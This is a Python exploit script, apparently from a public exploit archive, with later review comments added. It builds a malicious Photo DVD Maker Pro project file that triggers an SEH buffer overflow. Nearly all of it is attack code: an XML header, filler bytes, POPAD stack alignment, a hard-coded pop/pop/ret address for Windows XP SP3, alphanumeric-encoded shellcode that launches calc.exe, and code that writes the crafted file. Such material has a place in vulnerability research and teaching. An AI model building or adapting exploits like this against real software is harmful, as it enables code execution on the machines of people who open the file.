
# Title : Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)
# Published : 2009-07-10
# Author : His0k4


# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[+] Bug : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH)
#[+] Refer : Secunia advisory 35709
#[+] Exploit : His0k4
#[+] Tested on : Windows XP (SP3)

#[+] Description: The program filters some characters in the project file; I did not
#		  enumerate which ones, so the shellcode is encoded with the alpha2
#		  (alphanumeric) encoder instead of fighting the filter.

#[+] Note : After generating the project file, re-save it as UTF-8 without a BOM
#           (e.g. in a text editor) before using it.
#[+] Note2 : The exploit file has to be opened from inside the program (File > Open).


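# Head of a Photo DVD Maker project file (.pdm).  Decoded, the bytes are plain
# XML: an <?xml ... encoding="UTF-8" ?> prolog, a <Photo_DVD_Maker_Project
# version="7.00"> root with menu/options/album data, ending in the opening
# <File_Name>C:\ of an <Image_Data> element.  The overflow string is appended
# directly after this prefix, i.e. it becomes the File_Name value.
#
# The paths inside are harmless template values taken from the author's box:
# C:\Documents and Settings\victim\My Documents\Photo DVD Maker\090706113627
# and Z:\Anonymous.JPG for the album image.
#
# NOTE(review): this copy of the exploit had lost the backslash of every
# "\xNN" escape (the literals read "x3cx3f..."), so the script wrote literal
# hex text instead of the XML bytes.  The escapes are restored below; the
# result is 2910 bytes.
header1 =  "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20"
header1 += "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a"
header1 += "\x3c\x50\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f"
header1 += "\x6a\x65\x63\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x37\x2e\x30\x30\x22\x20"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x74\x68\x75\x6d"
header1 += "\x62\x6e\x61\x69\x6c\x5f\x73\x69\x7a\x65\x3d\x22\x38\x30\x22\x20\x61\x6c\x62\x75"
header1 += "\x6d\x5f\x66\x69\x6c\x65\x5f\x74\x69\x6d\x65\x5f\x73\x74\x61\x6d\x70\x3d\x22\x30"
header1 += "\x22\x20\x64\x69\x73\x6b\x5f\x66\x6f\x72\x6d\x61\x74\x3d\x22\x30\x22\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x54\x65\x6d\x70\x5f\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x43"
header1 += "\x3a\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x61\x6e\x64\x20\x53\x65\x74\x74"
header1 += "\x69\x6e\x67\x73\x5c\x76\x69\x63\x74\x69\x6d\x5c\x4d\x79\x20\x44\x6f\x63\x75\x6d"
header1 += "\x65\x6e\x74\x73\x5c\x50\x68\x6f\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72"
header1 += "\x5c\x30\x39\x30\x37\x30\x36\x31\x31\x33\x36\x32\x37\x3c\x2f\x54\x65\x6d\x70\x5f"
header1 += "\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x0a\x20\x20\x20\x20\x3c\x44\x56\x44\x5f"
header1 += "\x4d\x65\x6e\x75\x20\x62\x6b\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d"
header1 += "\x22\x31\x22\x20\x62\x6b\x5f\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22"
header1 += "\x30\x22\x20\x65\x6e\x63\x6f\x64\x65\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x6d\x70\x6c"
header1 += "\x61\x74\x65\x3e\x36\x34\x58\x6d\x61\x73\x2e\x78\x6d\x6c\x3c\x2f\x4d\x65\x6e\x75"
header1 += "\x5f\x54\x65\x6d\x70\x6c\x61\x74\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4d\x65\x6e\x75\x5f\x54\x69\x74\x6c\x65\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65"
header1 += "\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e\x74\x3d\x22\x43\x61\x74\x61\x6e\x65\x6f\x20"
header1 += "\x42\x54\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x66\x66\x22"
header1 += "\x20\x73\x69\x7a\x65\x3d\x22\x33\x38\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x30\x31\x22\x20\x68\x65\x69"
header1 += "\x67\x68\x74\x3d\x22\x34\x35\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73"
header1 += "\x68\x61\x64\x6f\x77\x3d\x22\x31\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30"
header1 += "\x78\x30\x65\x30\x61\x39\x64\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x32\x22\x20"
header1 += "\x78\x30\x3d\x22\x36\x30\x22\x20\x79\x30\x3d\x22\x37\x35\x22\x3e\x4d\x79\x20\x50"
header1 += "\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75\x6d\x3c\x2f\x4d\x65\x6e\x75\x5f\x54\x69\x74"
header1 += "\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63\x6b\x67\x72\x6f"
header1 += "\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22\x3e\x43\x3a\x5c"
header1 += "\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f\x74\x6f\x20"
header1 += "\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73\x69\x6f\x6e"
header1 += "\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e\x6d\x70\x33"
header1 += "\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64\x65\x5f\x49\x6e\x66\x6f"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x44\x56\x44\x5f\x4d\x65\x6e\x75\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x20\x64\x65\x6c"
header1 += "\x65\x74\x65\x5f\x74\x65\x6d\x70\x6c\x61\x74\x65\x5f\x66\x69\x6c\x65\x3d\x22\x31"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f"
header1 += "\x44\x69\x73\x6b\x4d\x65\x6e\x75\x5f\x44\x61\x74\x61\x20\x67\x72\x61\x79\x5f\x73"
header1 += "\x63\x61\x6c\x65\x3d\x22\x30\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x6d\x65\x6e"
header1 += "\x75\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69"
header1 += "\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20"
header1 += "\x76\x69\x73\x69\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x74\x68\x75\x6d\x62\x6e"
header1 += "\x61\x69\x6c\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x70\x61\x67\x65"
header1 += "\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20\x62\x46\x69\x78\x65\x64\x44\x75\x72"
header1 += "\x61\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x64\x77\x44\x56\x44\x4d\x65\x6e\x75\x44"
header1 += "\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x22\x20\x75\x73\x65\x5f\x64\x76\x64"
header1 += "\x5f\x6d\x65\x6e\x75\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6d\x6f\x64\x65\x3d"
header1 += "\x22\x32\x22\x20\x70\x6c\x61\x79\x5f\x73\x6c\x69\x64\x65\x73\x68\x6f\x77\x5f\x61"
header1 += "\x66\x74\x65\x72\x5f\x70\x6c\x61\x79\x69\x6e\x67\x5f\x6d\x65\x6e\x75\x3d\x22\x31"
header1 += "\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73"
header1 += "\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x20\x6a\x6f\x6c\x69\x65\x74\x3d\x22\x31\x22"
header1 += "\x20\x73\x61\x76\x65\x5f\x6f\x72\x69\x67\x69\x6e\x61\x6c\x5f\x66\x69\x6c\x65\x73"
header1 += "\x3d\x22\x30\x22\x20\x73\x61\x76\x65\x5f\x65\x78\x74\x72\x61\x5f\x66\x69\x6c\x65"
header1 += "\x73\x3d\x22\x30\x22\x20\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x3d\x22\x43\x6f\x70"
header1 += "\x79\x72\x69\x67\x68\x74\x28\x63\x29\x20\x76\x69\x63\x74\x69\x6d\x22\x20\x70\x75"
header1 += "\x62\x6c\x69\x73\x68\x65\x72\x3d\x22\x76\x69\x63\x74\x69\x6d\x22\x20\x76\x6f\x6c"
header1 += "\x75\x6d\x65\x6c\x61\x62\x65\x6c\x3d\x22\x50\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75"
header1 += "\x6d\x20\x6f\x66\x20\x76\x69\x63\x74\x69\x6d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x20\x20\x20\x3c\x4f\x50\x54\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65"
header1 += "\x73\x20\x66\x69\x6c\x65\x73\x3d\x22\x30\x22\x20\x66\x6f\x6c\x64\x65\x72\x3d\x22"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x4f\x50\x54"
header1 += "\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65\x73\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x54\x56"
header1 += "\x5f\x44\x61\x74\x61\x20\x70\x61\x6c\x3d\x22\x30\x22\x20\x63\x6f\x72\x72\x65\x63"
header1 += "\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x63\x72\x6f\x70\x3d\x22\x35\x22\x20\x63\x72"
header1 += "\x6f\x70\x5f\x65\x6e\x61\x62\x6c\x65\x3d\x22\x30\x22\x20\x61\x6e\x74\x69\x66\x6c"
header1 += "\x69\x63\x6b\x3d\x22\x31\x22\x20\x70\x68\x6f\x74\x6f\x5f\x73\x63\x61\x6c\x65\x5f"
header1 += "\x6d\x6f\x64\x65\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x52\x65\x63\x6f\x72\x64\x65\x72\x5f\x44\x61\x74"
header1 += "\x61\x20\x65\x6e\x61\x62\x6c\x65\x5f\x62\x75\x72\x6e\x5f\x70\x72\x6f\x6f\x66\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x75\x72\x6e\x5f\x64\x76\x64\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x64\x69\x73\x63\x5f\x69\x6d\x61\x67"
header1 += "\x65\x3d\x22\x30\x22\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x3d\x22\x30\x22\x20\x69"
header1 += "\x73\x6f\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x22\x22\x20\x63\x6f\x70\x69"
header1 += "\x65\x73\x3d\x22\x31\x22\x20\x64\x72\x69\x76\x65\x72\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x63\x64\x5f\x77\x72\x69\x74\x69\x6e\x67\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x73\x69\x6d\x75\x6c\x61\x74\x65\x5f\x77\x72\x69\x74\x69\x6e\x67\x3d"
header1 += "\x22\x31\x22\x20\x73\x70\x65\x65\x64\x3d\x22\x2d\x31\x22\x2f\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20"
header1 += "\x74\x79\x70\x65\x3d\x22\x73\x74\x69\x6c\x6c\x69\x6d\x61\x67\x65\x22\x20\x6e\x61"
header1 += "\x6d\x65\x3d\x22\x22\x20\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31"
header1 += "\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x6f\x6e\x65\x3d\x22\x32\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x74\x77\x6f\x3d\x22\x32\x22\x20"
header1 += "\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x79\x70\x65\x3d\x22\x30\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30\x22\x20\x61\x75"
header1 += "\x74\x6f\x5f\x70\x61\x6e\x5f\x7a\x6f\x6f\x6d\x3d\x22\x31\x22\x20\x6d\x75\x73\x69"
header1 += "\x63\x5f\x66\x61\x64\x65\x5f\x69\x6e\x5f\x6f\x75\x74\x3d\x22\x31\x22\x20\x62\x6b"
header1 += "\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x73\x70\x72"
header1 += "\x69\x74\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x65\x6e\x63\x6f\x64\x65"
header1 += "\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6f\x76\x65\x72"
header1 += "\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x73\x6f\x6e\x67\x3d\x22\x30\x22\x20\x74\x72"
header1 += "\x61\x6e\x73\x69\x74\x69\x6f\x6e\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x6e"
header1 += "\x6f\x6e\x65\x5f\x74\x72\x61\x6e\x73\x3d\x22\x30\x22\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x54\x68\x65\x6d\x65\x20\x6e\x61\x6d\x65"
header1 += "\x3d\x22\x5f\x6e\x6f\x5f\x74\x68\x65\x6d\x65\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x54\x69\x74\x6c\x65\x20\x45\x6e\x61\x62"
header1 += "\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67\x3d\x22\x22\x20\x63\x6f"
header1 += "\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b\x5f\x63\x6f\x6c\x6f\x72"
header1 += "\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22\x20\x45\x66\x66\x65\x63"
header1 += "\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x30\x22\x2f\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x43\x72\x65\x64\x69"
header1 += "\x74\x20\x45\x6e\x61\x62\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67"
header1 += "\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22"
header1 += "\x20\x45\x66\x66\x65\x63\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d"
header1 += "\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64"
header1 += "\x65\x5f\x46\x69\x6c\x65\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x41\x6c"
header1 += "\x62\x75\x6d\x5f\x49\x6d\x61\x67\x65\x20\x69\x64\x3d\x22\x30\x22\x3e\x5a\x3a\x5c"
header1 += "\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x2e\x4a\x50\x47\x3c\x2f\x41\x6c\x62\x75\x6d"
header1 += "\x5f\x49\x6d\x61\x67\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63"
header1 += "\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x30\x30\x30\x22\x20\x73\x74"
header1 += "\x61\x72\x74\x3d\x22\x30\x22\x20\x65\x6e\x64\x3d\x22\x34\x30\x30\x30\x30\x22\x20"
header1 += "\x6f\x66\x66\x73\x65\x74\x5f\x69\x6e\x5f\x74\x72\x61\x63\x6b\x3d\x22\x30\x22\x3e"
header1 += "\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f"
header1 += "\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73"
header1 += "\x69\x6f\x6e\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e"
header1 += "\x6d\x70\x33\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69"
header1 += "\x63\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x78"
header1 += "\x74\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e"
header1 += "\x74\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30"
header1 += "\x22\x20\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x30\x22\x20\x68\x65\x69\x67\x68"
header1 += "\x74\x3d\x22\x30\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73\x68\x61\x64"
header1 += "\x6f\x77\x3d\x22\x30\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30"
header1 += "\x30\x30\x30\x30\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x78\x30\x3d"
header1 += "\x22\x30\x22\x20\x79\x30\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x53\x75\x62\x74\x69\x74\x6c\x65\x5f\x46\x6f\x6e\x74\x20\x66\x69\x6c\x65"
header1 += "\x3d\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x46\x6f\x6e\x74\x73\x5c\x61"
header1 += "\x72\x69\x61\x6c\x2e\x74\x74\x66\x22\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x22\x69"
header1 += "\x73\x6f\x2d\x38\x38\x35\x39\x2d\x31\x22\x20\x73\x69\x7a\x65\x3d\x22\x33\x32\x22"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6d\x61\x67\x65\x5f\x44\x61"
header1 += "\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20\x61\x6e\x67\x6c\x65\x3d\x22\x30\x22\x20"
header1 += "\x74\x72\x61\x6e\x73\x3d\x22\x42\x6f\x78\x20\x57\x69\x70\x65\x20\x2d\x20\x54\x2e"
header1 += "\x20\x74\x6f\x20\x4c\x2e\x5b\x54\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x4c\x69\x62"
header1 += "\x5d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x46\x69\x6c"
header1 += "\x65\x5f\x4e\x61\x6d\x65\x3e\x43\x3a\x5c"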

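# Tail of the project file, appended after the overflow string.  Decoded it is
#   '.JPG</File_Name>\n        </Image_Data>\n    </Album_Data>\n</Photo_DVD_Maker_Project>'
# i.e. it gives the File_Name value an image-looking ".JPG" suffix and closes
# every element opened in header1 so the document is still well-formed XML.
#
# NOTE(review): as with header1, the "\xNN" escapes in this copy had lost their
# backslashes; restored here (83 bytes).
header2 =  "\x2e\x4a\x50\x47\x3c\x2f\x46\x69\x6c\x65\x5f\x4e\x61\x6d\x65\x3e\x0a\x20\x20\x20"
header2 += "\x20\x20\x20\x20\x20\x3c\x2f\x49\x6d\x61\x67\x65\x5f\x44\x61\x74\x61\x3e\x0a\x20"
header2 += "\x20\x20\x20\x3c\x2f\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x3e\x0a\x3c\x2f\x50"
header2 += "\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f\x6a\x65"
header2 += "\x63\x74\x3e"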

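# Assemble the malicious project file: header1 + overflow string + header2.
# The overflow string is the text of the <File_Name> element.  Apart from the
# handler address every byte is alphanumeric, because the parser drops other
# characters (see Description above) — hence the POPAD/DEC ESP "stack walking"
# and the alpha2-encoded shellcode instead of a plain jump + raw payload.
#
# NOTE(review): the "\xNN" escapes in this copy had lost their backslashes
# ("x41" instead of "\x41"); restored below so the offsets/opcodes are real.
payload =  header1
payload += "\x41"*257             # filler up to the SEH record ('A' = INC ECX if executed)
#align esp
payload += "\x61"*4 #popad        # nSEH: 4 x POPAD, executed once the pop/pop/ret returns here
payload += "\x56\x29\xD1\x72" # printable p/p/r msacm32.drv (xp/sp3)
# SE handler = 0x72D12956 (little-endian), a pop/pop/ret inside msacm32.drv.
# Hard-coded for Windows XP SP3 (Tested on, above); the gadget moves on any
# other build/service pack/locale, so this address is not portable.
# 0xD1 is not 7-bit ASCII.  The author's note about re-saving the file as
# UTF-8 (no BOM) is presumably what makes that byte survive the program's
# XML decoding — TODO confirm against the target before relying on it.
payload += "\x21"    #making a "Not taken jump"
# When execution falls through the handler bytes, 0x72 0x21 is JB +0x21; per
# the author's comment the carry flag is clear so the branch is not taken and
# the POPAD run below executes.
payload += "\x61"*39 #popad       # 39 more POPAD: each pops 32 bytes, moving esp up the stack
payload += "\x4C"*4  #dec esp     # 4 x DEC ESP: final adjustment of esp for the decoder
payload += "\x41"*4  #padding

#win32_exec calc -encoded with alpha2 zero tolerance => 741 bytes
# Benign proof-of-concept payload (spawns calc.exe).  alpha2 output is pure
# alphanumeric so it passes the parser's filter; the leading "TY" bytes are
# PUSH ESP / POP ECX, which presumably seeds the decoder's base register from
# esp — that is why the POPAD/DEC ESP sequence above has to position esp here.
payload += (
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIzK7sciJKd"
"EYxzXIoKOio0OPIRiqY2ig9syRq0ZsfSdQHvVVStp66Rxp4cqFPRbP6pHbhTp"
"QRTs6PpB2cpVRxwBsr2d721XgDra7BQQqTdpw1pDbtqRStrq724p1QStRaqFP"
"Xp4qJ7HSrRdszpOpM0NPO3zpNaVV4QRRpw2P0crTppKG8QUw4pN3spK5hbnqW"
"Suv00J1GrapPpOpNrkfXRoSdPJpQ2kgHPOPUpBpRaQvPPKbnsyWDpKDxSvecp"
"KW8g12p0PrnraaSw2pLRipIPNszaVpXaRPLW6QGqWp0SqpLPL2lrmrpcq4p74"
"RlRkbnrf0O2kTsQVduRfRbW6fPsu5g3uPN0KsxroSusv3bW1bpPKrn1XVVBkV"
"XpNRpbkQDBkQX2opEpNPQ1Qf0PKpNRkcxpNtq0KbxQQtppKbnrirxrnpUW6f2"
"sv0P1Sblg163g2PLQV4vpKsh1RPTQRBs0Eg8srpLPJRwrnPPPKPHsrw4PNFP2"
"kpXW2pWPNRqRmQZ0KRhpJrfrjbp0Krn3ytppKRhPBuhCr0KpBPP1R60srrpBk"
"UhPJQV0N5cPO4uqQp3QXroqR2fQXsuPIQXqZRoSs7H2b0L2k0WQRSuRj6VBbp"
"ORltxcvp0BoSepJqFqZtybppOpLPXRpPP2gruropOw7Bn1SrvraRfpNBvQS0V"
"crpPsjTJA")
payload += header2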

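# Write the crafted project file next to the script.
# - Binary mode keeps the bytes exactly as assembled; text mode on Windows
#   would rewrite the 0x0a bytes inside the XML as CR/LF.
# - The context manager closes the handle even if write() raises (the
#   original left it open on failure).
# - Only I/O errors are caught, and the reason is printed instead of a bare
#   "Error" that hides permission/disk problems; anything else propagates.
# On Python 3 the payload is a str and is encoded 1:1 (latin-1) so the 0xD1
# byte of the handler address is written as a single byte, as on Python 2.
try:
    data = payload if isinstance(payload, bytes) else payload.encode("latin-1")
    with open("exploit.pdm", "wb") as out_file:
        out_file.write(data)
    print("\nExploit file created!\n")
except IOError as e:
    print("Error writing exploit.pdm: %s" % e)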
